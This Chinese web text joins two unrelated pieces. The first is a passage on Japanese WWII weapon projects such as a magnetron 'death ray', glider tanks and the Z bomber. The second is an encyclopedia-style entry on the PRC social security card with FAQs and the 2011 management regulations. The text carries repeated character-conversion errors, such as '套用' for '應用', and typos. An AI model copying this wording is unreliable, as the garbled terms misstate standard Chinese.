喜歡開發另類戰斗方式的日本人也曾積極開發一種死亡射線，這是一種集中的能量束，可以將數百英里外的飛機擊落，根據戰後被美軍沒收的文件中顯示，日本人的死亡射線研究工作早在1939年就開始了，研究人員開發了一種高功率磁控管，可以產生輻射束，物理學家SinitiroTomonaga的團隊開發了一種直徑為8英寸(20厘米)的磁控管，輸出功率為100 kW，然而，這項技術是否能像科幻小說中的死亡射線一樣發揮作用是值得懷疑的。計算表明，如果光束聚焦得當，可能會在1000碼的距離內殺死一隻兔子，但前提是兔子至少能在5分鍾內完全靜止不動。

飛行坦克

二戰期間日本軍隊面臨的主要問題之一是從一個島嶼到另一個島嶼運輸重型裝備，如坦克，一種潛在的解決辦法是以飛行的形式，或者更確切地說是滑翔坦克。

這些輕型坦克的特點是裝備有可拆卸的機翼，尾翼(穩定在飛機尾端的表面)和能夠起飛車體，掛載在三菱Ki-21「薩利」重型轟炸機上，到達作戰區域後它就會像滑翔機一樣滑翔到目的地，降落後開始執行各種任務。

Z型超級轟炸機

就像納粹美國轟炸機計劃一樣，日本帝國希望有一架能夠到達北美的洲際轟炸機。隨著戰爭的進行，日本人迫切需要類似於美國B-29這種類型的轟炸機。

1941年，日本海軍推出了實驗性的13式攻擊轟炸機，一種四引擎遠程重型轟炸機，但是參謀本部想要更大、更重、更快的運載工具，能夠在32800英尺的高度飛行，裝載22000磅的炸彈。為此，日本陸軍開始著手研製此類飛機，包括中島G10N和川崎Ki-91相繼被退出，前者有237英尺的翼展和144英尺的總長度，它將能夠以590公里/小時的速度在25000英尺的高度上飛行，裝備有六台5000馬力的發動機，不過由於戰爭條件惡化，Z項目於1944年7月被取消。

日本(95)日本人(6)氣球(1)

D. 中華人民共和國社會保障卡詳細資料大全

中華人民共和國社會保障卡是由人力資源和社會保障部統一規劃，由各地人力資源和社會保障部門面向社會發行，用於人力資源和社會保障各項業務領域的積體電路（IC）卡。

社會保障卡作用十分廣泛。持卡人不僅可以憑卡就醫進行醫療保險個人賬戶實時結算，還可以辦理養老保險事務；辦理求職登記和失業登記手續；申領失業保險金；申請參加就業培訓；申請勞動能力鑒定和申領享受工傷保險待遇；在網上辦理有關勞動和社會保障事務等。

社會保障卡採用全國統一標准，社會保障號碼按照《社會保險法》的有關規定，採用公民身份號碼。

截至2018年6月底，全國社會保障卡持卡人數達到11.5億人。

基本介紹

• 中文名 ：中華人民共和國社會保障卡
• 外文名 ：People's Republic of China social security card
• 簡稱 ：中國社保卡
• 作用 ：用於社會保障服務

類型,功能,作用,辦理條件,開展情況,現狀,范圍,問題解答,安全設計,管理辦法,第一章 總 則,第一條,第二條,第三條,第四條,第二章 發行管理,第一條,第二條,第三條,第四條,第三章 製作管理,第一條,第二條,第三條,第四條,第五條,第四章 套用管理,第一條,第二條,第三條,第四條,第五條,第六條,第五章 安全管理,第一條,第二條,第三條,第四條,第五條,第六條,第七條,第六章 產品管理,第一條,第二條,第三條,第四條,第五條,第七章 附則,第一條,第二條,第三條,

類型

社會保障卡從持卡人類型來看，可以分為兩類，即：面向城鎮從業人員、失業人員和離退休人員發放的稱為社會保障（個人）卡，面向用人單位發放的稱為社會保障（用人單位）卡。我國勞動保障部有關卡規劃和規范的重點為社會保障（個人）卡，各地區實際發放的也多集中於個人卡，所以我們所說的社會保障卡，就是指社會保障（個人）卡。

功能

社會保障卡卡面和卡內均記載持卡人姓名、性別、公民身份號碼等基本信息，卡內標識了持卡人的個人狀態（就業、失業、退休等），可以記錄持卡人社會保險繳費情況、養老保險個人賬戶信息、醫療保險個人賬戶信息、職業資格和技能、就業經歷、工傷及職業病傷殘程度等。社會保障卡是勞動者在勞動保障領域辦事的電子憑證。持卡人可以憑卡就醫，進行醫療保險個人賬戶結算；可以憑卡辦理養老保險事務；可以憑卡到相關部門辦理求職登記和失業登記手續，申領失業保險金，申請參加就業培訓；可以憑卡申請勞動能力鑒定和申領享受工傷保險待遇等。此外，社會保障卡還是握在勞動者手中開啟與系統聯絡之門的鑰匙，憑借這把鑰匙，持卡人可以上網查詢信息，將來還可以在網上辦理有關勞動和社會保障事務。 中華人民共和國人力資源和社會保障部正在推行社保一卡通，部署擴展社會保障卡套用領域的工作。為此，該部發布了《關於社會保障卡載入金融功能的通知》。載入金融功能後的社會保障卡在具有信息記錄、信息查詢、業務辦理等功能的同時，還可作為銀行卡使用，具有現金存取、轉賬、消費等金融功能。以便促進金融服務民生，方便民眾享受社保待遇和金融服務。 具有金融功能的社會保障卡的金融套用為人民幣借記套用，暫不支持貸記功能。該卡卡片介質一般為接觸式晶片卡，但也有銀行發行介質為接觸+非接觸的雙界面卡的社會保障卡，社保卡用晶片加隱蔽磁條復合卡的形式暫時過渡，晶片中應同時包含人力資源社會保障套用和金融套用。社會保障卡採用全國統一標淮，社會保障號碼按照《社會保險法》的有關規定，採用公民身份號碼。從此，社保卡將加入金融功能，全國統一。 例如，北京市居民健康卡、京醫通卡及北京通卡將實現「三卡合一」。此前，大多數北京市民在就醫過程中都曾遇到過這樣的問題，光拿上社保卡卻發現有時掛號、結算醫院並不認，還需要再額外辦理各家醫院的就診卡。 與此同時，本市推行了超過5年的居民健康卡、在北京市屬醫院范圍內全覆蓋的京醫通卡以及主要面向本市新農合參合農民發放的北京通卡三種卡片在功能上也存在交叉和重疊。 融合後的新北京通卡分為北京通社保卡、北京通基本卡和北京通臨時卡三類。北京通社保卡和北京通基本卡的發放對象為在京繳納社保的常住居民（含北京戶籍人口和非北京戶籍人口），北京通臨時卡發放對象則為臨時來京人員。屆時，北京通社保卡將包括社保套用、「北京通」套用、健康套用、金融套用、交通套用；北京通基本卡包括「北京通」套用、健康套用、金融套用、交通套用。最終這張「北京通」將成為一張多功能社會服務卡。 北京市醫管局也會做好技術銜接，同時各醫療機構也會逐步完成院內讀卡機的升級改造。到2017年年底，預計面向本市270萬新農合參合農民的發卡率將達到85%。在北京通卡發放後，包括各大醫院的就診卡和京醫通卡等將會逐步退出。

作用

1.個人社會保障相關信息記錄、電子憑證和信息查詢等; 2.記錄參保人員姓名、身份證號碼、出生年月、性別、民族、戶籍所在地等基本信息; 3.查詢本人養老、失業、醫療、工傷和生育保險繳納情況; 4.可持卡到醫院就醫，進行醫療保險個人賬戶結算，到葯店買葯; 5.辦理醫療、失業、養老、工傷和生育等社保事務; 6.查詢養老保險、醫療保險累計總額等信息; 7.辦理領取養老金等社保事務，進行求職、失業登記，申領失業保險金，申請參加職業培訓等。 8.用於身份證明。

辦理條件

符合申領條件的人員可以通過電話向申領網點預約或直接前往街道（鎮）社會保障卡申領服務網點申請辦理社會保障卡（包括學籍卡）。申領時需攜帶身份證、戶口簿、申領表（集體戶口市民需要攜帶戶籍所在地警署或派出所開具的戶籍證明）等相關資料。咨詢電話12333。

開展情況

現狀

自2011年9月起，多地社會保障卡載入金融功能，社保卡更換了金融晶片，新社保卡成為持卡人享有社會保障和公共就業服務權益的電子憑證，具有信息記錄、信息查詢、業務辦理等社會保障卡基本功能的同時可作為銀行卡使用，具有現金存取、轉賬、消費等金融功能。 截至2016年底，我國社會保障卡持卡人數達9.72億人，2017年，社保卡還將基本實現全國一卡通。 截至2018年6月底，全國社會保障卡持卡人數達到11.5億人。

范圍

金融社保卡在全國范圍內鋪開，包括廣東、湖北、內蒙、黑龍江、山西、山東、寧夏、河北、貴州、新疆、重慶等地都開始發行金融社保卡。

問題解答

問：在使用社保卡之前，已發生門診醫療費用，如何報銷？ 答：使用社保卡之前，已發生的門診醫療費用，交到單位或社保所按原流程報銷，如果您已使用過社保卡就醫，需同時將社保卡上交。 社會保障卡 問：門診掛號診療費用不按比例報銷了？ 答：自2009年6月1日起，門診診療費由醫療保險基金定額支付2元，其餘費用由參保人員現金交納。值得說明的是，無論患者發生的醫療費用是否超過門診起付線，醫療保險基金同樣定額支付2元。 問：外購葯品醫療費用是否持卡實時結算？ 答：因外購葯品發生的醫療費用不進行持卡實時結算，仍按原結算方式操作。 問：參保人員什麼特殊情況下發生的全額現金墊付醫療費用可進行報銷？ 答：如遇有急診未持社會保障卡、計畫生育手術、企業欠費、手工報銷或補換社保卡期間、參保後未發社會保障卡等情況就醫的，仍由參保人員個人現金全額墊付醫療費用，不能在醫院直接完成實時結算，符合醫療保險基金支付條件的，要按照原流程辦理手工報銷手續。 問：如何讀懂實時結算收費票據？ 答：實時結算收費票據明細中，醫療保險范圍內金額能夠納入醫療保險支付范圍的費用總額。 本次醫療保險基金支付：按照政策規定應由醫療保險基金支付的費用總額，包括門診大額醫療，退休人員補充保險，殘疾軍人補助。 「本次個人負擔」的醫療費用包括三部分內容： 1、自付一：按比例個人應負擔的醫療費用（包括起付線和超封頂線以上金額）； 2、自付二：乙類目錄中需要個人負擔的金額（如乙類葯品中個人自付的10%的醫療費用）； 3、自費：報銷范圍（即葯品、診療、服務設施三個目錄）以外的醫療費用； 當次就醫醫療費用總額=本次醫療保險基金支付+本次個人負擔。 問：在職轉退休人員應如何進行社保卡信息變更？ 答：持卡人信息，可到發卡單位所在區縣的社保經辦機構進行數據同步。 問：在職轉退休人員沒有及時變更社保卡信息會出現哪些問題？ 答：在職職工退休後沒有及時變更信息，在持卡就醫時，仍將按照在職職工的門診起付線和報銷比例進行報銷，這可能會損害參保人員的醫保權益。 問：持卡就醫是否需要選定醫院？ 答：實行持卡就醫後，個人就醫的定點醫療機構仍以醫保手冊選定的定點醫療機構為准，A類、中醫、專科醫院可以直接就醫。 問：參保人員持社保卡就醫，起付線有變化嗎？ 答：持卡就醫後起付線標准不變：參保人員門（急）診費用一個年度內只扣一個起付線：超過起付線的部分，按照政策規定的報銷比例，個人只負擔應自付部分的醫療費用。 問：持卡就醫後，個人帳戶管理的政策有何調整？ 答：個人帳戶管理的政策沒有調整。持卡就醫後參保人員的個人帳戶金額仍按月劃入參保人在北京銀行的醫保專用存摺中，個人帳戶資金仍可在銀行自主支取。 問：已領取社保卡的參保人不慎將醫保手冊（藍本）丟失，如何處理？如社保卡丟失，如何補辦？ 答：需通過單位到參保地的區縣社保中心辦理補領醫保手冊（藍本）手續，在補辦醫保手冊（藍本）時，單位需提供持卡人的社保卡，區縣社保中心將為其同步更新社保卡的卡內信息。 社保卡丟失需通過單位到參保地的區縣社保中心辦理補領卡手續，單位需同時提供參保人員的醫保手冊（藍本），區縣社保中心將為其同步更新社保卡的卡內信息。 問：社會保障卡到哪裡領取？ 答：在職人員在參保單位領卡；退休人員在原參保單位領卡；社會化管理退休人員在參保街道社保所領取；職介、人才存檔人員在參保區職介、人才服務中心領卡。 問：領到卡後，發現卡內信息有誤怎麼改？ 答：發現此種情況，多為照片與本人不符，或姓名音同字不同等。凡屬上述情況，持卡人應通過單位將社保卡交回區社保中心。 問：領到的社保卡與本人身份證信息不一致怎麼辦？ 答：將社保卡與身份證或戶口簿復印件交給單位，由其上交區縣社保中心重新制卡。 問：如何查詢卡內信息？ 答：可持卡到卡服務網點由工作人員幫助查詢，或持卡在自助終端機電子觸控螢幕上自助查詢。 本市社保卡服務體系主要由社保卡服務網點、社保卡服務熱線、社保卡服務網站和社保卡自助服務終端四部分組成。社保卡服務網點設定在全市300多個街道社會保障事務所和18個區縣社保中心及市經濟開發區社保中心，方便持卡人辦理社保卡相關業務；社保卡服務熱線是「96102」，提供24小時開通服務；另外通過登錄北京市人力資源和社會保障網，可進入社保卡服務網站界面。社保卡服務網點和本市二級以上的定點醫療機構內均安裝了社保卡服務自助終端機，可實現查詢醫保信息以及預掛失等功能。 問：為什麼單位中有的職工有卡，有的沒有？ 答：本次發放的社會保障卡為2009年2月16日零時醫療保險資料庫中的時點信息，此後新參保的人員及因信息比對有誤需進行二次信息採集的人員不在本次發卡范圍。因此，造成單位中有的職工有卡，有的沒有。 問：參保人領卡後，對持卡就醫的時間如何確定？為什麼一些單位告知參保人在下半年或年度才能使用社保卡就醫結算？ 答：參保人員在領到社保卡後，即可到定點醫療機構持卡就醫、實時結算。但在此之前如有個人全額墊付的醫療費用，應提前辦理手工報銷手續。 問：已領取社保卡的參保人員，其手中的醫保手冊（藍本）是否繼續使用？ 答：本市的社保卡將分期分批發放，在社保卡完全替代醫保手冊（藍本）之前，社保卡與醫保手冊（藍本）並行使用。醫保手冊（藍本）停止使用時，將向全市發布通知予以告知。 問：本次看病忘了帶卡怎麼辦？ 答：領到社保卡的參保人員在已開通持卡就醫結算服務的定點醫療機構就醫，須出示社保卡。未出示社保卡的，所發生費用由個人全額負擔，醫保基金不能支付。 問：初次使用社保卡的參保人員如何辦理開卡的手續？ 答：參保人員持社保卡到定點醫療機構就醫，在辦理掛號或交費的同時，社保卡即可開通。 問：持社會保障卡怎樣看病？ 答：首先，在掛號時必須出示社會保障卡，現金交納個人自付、自費費用，醫院為參保人員出具收費票據；其次，到診室看病時，要向醫生主動出示社會保障卡和「北京地區醫療機構門急診病歷手冊」；第三，交費時，須將社會保障卡和交費單據一起交給結算人員，繳納個人自付、自費部分費用；最後拿到結算單據後，認真核對單據上的各項內容，收回社保卡。 問：退休人員統一補充醫療保險是否同時刷卡結算？ 答：是。 問：補（換）社會保障卡期間如何看病？ 答：參保人員在申請補（換）社會保障卡期間，到定點醫療機構就醫時，需要主動出示《新發與補（換）社會保障卡證明》。定點醫療機構根據《新發與補（換）社會保障卡證明》採集有關的信息，並上傳費用明細。定點醫療機構為參保人員結算醫療費用時，全額收取現金，出具相關單據，參保人員持新的社會保障卡按原流程進行醫療費用申報。 問：持卡人員到不具備刷卡條件的定點醫療機構如何就醫？ 答：持卡人員到不具備刷卡條件的定點醫療機構就醫，先現金全額交費，由醫院為參保人員出具醫療費用單據，並上傳醫療費用明細，參保人員持社會保障卡按原流程進行門診醫療費用報銷。 問：發生工傷事故後就醫，如何區分是否應當用社保卡實時結算？如實時結算了，後又被認定工傷，如何解決？ 答：如果認定確實是工傷事故，應全額墊付醫療費用，後經由工傷保險報銷；如實時結算，後又被認定工傷，參保人員將實時結算的費用辦理退費，再全額墊付醫療費用，事後將全額墊付的醫療費用申報至區縣醫療保險經辦機構進行手工報銷。 問：哪些情形需進行社保卡信息變更？ 答：(1)醫療保險在職轉退休；(2)殘疾軍人新參保；(3)轉換醫療保險險種；(4)特殊病種審批；(5)手冊丟失補領手冊。

安全設計

卡系統軟體包括密鑰管理系統、發卡管理系統、卡管理維護系統、交易管理介面、卡內查詢系統、帳務管理、數據網路傳輸、清算管理、HIS(醫療信息管理系統)、異常交易處理功能等等。 社保卡的硬體體系結構主要包括：伺服器、工作終端、初始化設備、讀卡設備、加密機等等。 該卡要求採用密碼演算法，採用晶片技術合作，有很嚴格的密鑰管理體系和審批程式，造假可能性極低。 李東榮表示，就掌握的情況看，造假的可能性是極低的，這個卡要求是採用密碼演算法，採用晶片技術合作，有很嚴格的密鑰管理體系和審批程式。李東榮還說，社保卡的金融套用不支持貸記功能，使用范圍也是在境內。 社保卡是國家賦予個人社會保障權益的一種載體，請大家保護好自己的權益，特別是載入金融功能後，把卡借給別人就等於把自己的銀行卡借給別人，對自己的權益是一個損失，也給犯罪分子提供了犯罪的土壤。

管理辦法

關於印發「中華人民共和國社會保障卡」管理辦法的通知（人社部發〔2011〕47號） 人力資源社會保障部副部長胡曉義 各省、自治區、直轄市人力資源社會保障廳（局），福建省公務員局，新疆生產建設兵團人事局、勞動保障局： 為推動「中華人民共和國社會保障卡」（以下簡稱社會保障卡）的發行和套用，規范社會保障卡管理，促進社會保障卡建設穩妥、有序、健康地開展，現將《「中華人民共和國社會保障卡」管理辦法》印發你們，請遵照執行。 本辦法主要對各級人力資源社會保障部門管理社會保障卡的各個環節進行規范。對於社會保障卡封裝、運輸、使用及持卡人權益等涉及人力資源社會保障系統外部環節的管理要求，我部將另行規定。 中華人民共和國人力資源和社會保障部 二〇一一年四月二十日

第一章 總 則

第一條

為規范「中華人民共和國社會保障卡」（以下簡稱社會保障卡）發行、套用和管理，維護持卡人的合法權益，提高人力資源社會保障管理服務水平，制定本辦法。

第二條

本辦法所稱社會保障卡，是指面向社會公眾發行，主要套用於人力資源社會保障領域 *** 社會管理和公共服務的積體電路卡。 社會保障卡是持卡人享有社會保障和公共就業服務權益的電子憑證，具有信息記錄、信息查詢、業務辦理等基本功能。

第三條

人力資源社會保障部負責管理全國社會保障卡發行和套用工作。省、地市級人力資源社會保障部門負責管理本地區社會保障卡發行和套用工作，其所屬的信息化綜合管理機構具體承擔社會保障卡發行和技術管理的有關事務。

第四條

社會保障卡按照「一卡多用，全國通用」的原則進行建設。各地發行社會保障卡必須遵循安全性、完整性和公益性的要求，採用全國統一的標准規范，保證在全國范圍內使用。

第二章 發行管理

第一條

省級人力資源社會保障部門或地市級人力資源社會保障部門經人力資源社會保障部批准後，可發行社會保障卡。其他任何機構和組織均不得發行社會保障卡。

第二條

發行社會保障卡的地區（以下簡稱發卡地區）應建立規范的人力資源社會保障業務流程，各項業務間具有較強的綜合協調性，能夠保證社會保障卡的有效套用。同時，還應具備以下技術條件： （一）建立為社會保障卡套用提供後台支持的業務管理系統、資料庫和適於用卡方式的信息網路； （二）具備支持社會保障卡管理和套用的技術力量，包括人員、設備等，能夠快速完成社會保障卡套用的系統布局； （三）制定規范可行的實施方案，包括套用設計方案、費用解決方案、信息採集方案和具體發行方案等； （四）建立科學完善的社會保障卡發行、管理制度和明確的內部控製程式，並制定應對突發事件的預案； （五）人力資源社會保障部規定的其他條件。

第三條

申請發行社會保障卡，需提交下列材料： （一）填寫完備的社會保障卡發行注冊申請表； （二）社會保障卡發行籌備情況說明； （三）符合全國統一規范要求的套用領域和卡內套用檔案結構（包括本地擴充的套用領域和指標）； （四）按照統一要求設計的卡面樣式； （五）本地區社會保障卡管理辦法和實施細則； （六）人力資源社會保障部要求提供的其他材料。

第四條

社會保障卡的注冊審批程式： （一）省級人力資源社會保障部門發行社會保障卡，需將申請發行材料報人力資源社會保障部信息化領導小組辦公室審核。 （二）地市級人力資源社會保障部門發行社會保障卡，需將申請發行材料報省級人力資源社會保障部門進行初審。初審通過後，報人力資源社會保障部信息化領導小組辦公室審核。 （三）人力資源社會保障部信息化領導小組辦公室審核批准後，統一為被批准發行社會保障卡的地區分配社會保障卡發行機構標識號，並按國家有關規定向國家IC卡注冊中心備案。 （四）發卡地區若變更社會保障卡卡面、卡內檔案結構等須報人力資源社會保障部信息化領導小組辦公室重新審批。若變更供卡廠商和產品、擴大發卡人群、增加擬發卡數量等，須報人力資源社會保障部信息化領導小組辦公室備案。

第三章 製作管理

第一條

社會保障卡採用全國統一的卡面樣式，正面印有「中華人民共和國社會保障卡」字樣，背面印有持卡人姓名、社會保障號碼、持卡人照片、發卡單位等信息。

第二條

社會保障卡卡內檔案結構劃分、控制密鑰載入、卡面印刷、個性化信息寫入等製作工作，由省級社會保障卡發行管理機構統一組織；省級不具備集中製作條件的，可交由發卡地市或第三方機構承辦。

第三條

發卡地區選定的承辦社會保障卡製作的第三方機構，應具備符合人力資源社會保障部要求的安全生產環境，在數據存放、傳輸、使用以及卡片運輸過程中具有嚴格的安全管理措施，能夠保證社會保障卡數據和密鑰的安全。

第四條

初次制卡、更換供卡廠商和產品等情況下，均須通過正式制卡環境先行製作測試卡，通過人力資源社會保障部信息化領導小組辦公室組織的標准符合性審核、安全性審核和跨地區通用性測試後，方可正式製作、發放。

第五條

發卡地區要按照方便持卡人的原則，制定科學、合理的發放流程，便捷地將社會保障卡發放到持卡人手中。

第四章 套用管理

第一條

各級人力資源社會保障部門應積極推動社會保障卡在各業務領域的套用。對於暫不具備用卡條件的業務，須做好預留。對於需要藉助金融功能開展的業務，應通過在社會保障卡上搭載金融功能的方式實現。

第二條

各級人力資源社會保障部門應保障持卡人查詢、辦理人力資源社會保障業務的權利，採取技術手段和管理措施，保護持卡人的個人隱私，依法使用與社會保障卡有關的信息，確保社會保障卡的安全使用。

第三條

經批准發行社會保障卡的省級、地市級人力資源社會保障部門應制定明確的社會保障卡套用管理規程，並通過在服務場所明示、 *** 網站公示等方式向社會發布。社會保障卡套用管理規程應包括以下內容： （一）社會保障卡的功能、用途； （二）社會保障卡的發行對象、申領條件、申領手續； （三）社會保障卡的使用范圍（包括使用方面的限制）、使用期限及使用方法； （四）社會保障卡損壞、遺失後的掛失、補發程式； （五）發卡機構、持卡人及其他有關當事人的權利、義務等。

第四條

人力資源社會保障部統一規劃和部署社會保障卡的跨地區套用，實行跨地區套用接入制度。人力資源社會保障部信息化領導小組辦公室具體負責對各地用卡環境的一致性和安全性檢查，檢查通過的予以接入。

第五條

社會保障卡應主要用於人力資源社會保障業務領域。在保持主要功能不變、標准規范不變、密鑰體系不變、管理主體不變的前提下，經省級人力資源社會保障部門同意、人力資源社會保障部批准，可以搭載其他公共服務功能。

第六條

社會保障卡因損壞、遺失、到期等原因不再使用的，應列入失效名單。失效名單實行分級管理，人力資源社會保障部、省級、地市級人力資源社會保障部門分別管理全國、全省、全市范圍內的社會保障卡失效名單，並提供查詢服務。

第五章 安全管理

第一條

社會保障卡採用密鑰安全技術，實行全國統一的密鑰管理體系。

第二條

人力資源社會保障部負責生成和管理全國通讀通寫檔案的控制密鑰、及其他需要在全國范圍內使用的密鑰，並按照統一規則逐級分散給省、地市兩級人力資源社會保障部門，形成子密鑰。 省、地市兩級人力資源社會保障部門負責生成和管理僅限本地區使用的密鑰，以及本地區自行擴充檔案的讀寫密鑰；負責管理由人力資源社會保障部逐級分散給其的子密鑰。

第三條

用於社會保障卡密鑰管理和安全套用的加密機須具有國家密碼管理部門頒發的商用密碼產品型號證書，並符合人力資源社會保障部有關規范要求。

第四條

用於存儲密鑰的社會保障卡主控密鑰卡、密鑰母卡、傳輸密鑰卡、安全訪問控制模組（PSAM卡）等由人力資源社會保障部統一發放。

第五條

發卡地區須建立嚴格的社會保障卡密鑰管理制度，嚴格規范密鑰及加密機、主控密鑰卡、密鑰母卡、傳輸密鑰卡等密鑰載體的保管、使用程式；在確需將密鑰載體移交給第三方使用時，須做好交接記錄，簽署保密協定，審核其安全管理方案，並對第三方的使用情況進行監督。

第六條

發卡地區須建立PSAM卡管理制度，詳細記錄其具體信息和使用情況，建立收回、銷毀機制，並對其實際使用時的物理形式、外界條件、使用方式等進行明確規定，保證用卡環境安全。

第七條

各級人力資源社會保障部門應建立社會保障卡安全管理應急預案，妥善處理社會保障卡發放、使用、及密鑰管理中出現的安全問題。凡出現密鑰載體遺失等安全事故的地區，須立即報告上級人力資源社會保障部門和人力資源社會保障部，並查明原因，根據國家關於安全保密的有關規定做出處理。

第六章 產品管理

第一條

社會保障卡晶片實行備案制度。發卡地區擬選用的晶片，應報人力資源社會保障部信息化領導小組辦公室備案後，才能在社會保障卡中採用。

第二條

發卡地區擬選用的晶片，應從具備以下條件的晶片廠商所提供的產品中選擇： （一）國家信息產業主管部門認定的積體電路設計企業； （二）具有國家密碼管理部門頒發的商用密碼產品銷售許可證和商用密碼產品生產定點單位證書，至少有一款積體電路卡（IC卡）晶片產品通過國家相關部門組織的通用准則評估保證級別4+（EAL4+）的信息安全認證； （三）企業管理規范，通過ISO9001質量體系認證並取得相應證書。

第三條

社會保障卡的晶片應符合以下條件： （一）為硬掩膜工藝加工製造的智慧卡（CPU卡）晶片，存儲器應由隨機存儲器（RAM）、唯讀存儲器（ROM）、電可擦可程式唯讀存儲器（EEPROM）組成，不包含其他類型的存儲器； （二）支持國家密碼管理部門認可的加密演算法，具有國家密碼管理部門頒發的商用密碼產品型號證書； （三）提供晶片的廠商對該晶片具有自主智慧財產權。

第四條

發卡地區應選擇具有自主開發能力的廠商提供的社會保障卡卡內作業系統（COS）和讀寫機具，其選定的上述產品均需符合人力資源社會保障部社會保障卡規范要求。

第五條

人力資源社會保障部組織省級人力資源社會保障部門對已投入使用的社會保障卡產品質量和標准符合性等進行檢查、監督。

第七章 附則

第一條

社會保障卡的發行費用依據國家有關規定報批並收取。

第二條

社會保障卡相關技術規范、辦事流程、制度要求、卡面樣式等，由人力資源社會保障部信息化領導小組辦公室依據本辦法另行規定。

第三條

本辦法由人力資源社會保障部信息化領導小組辦公室負責解釋。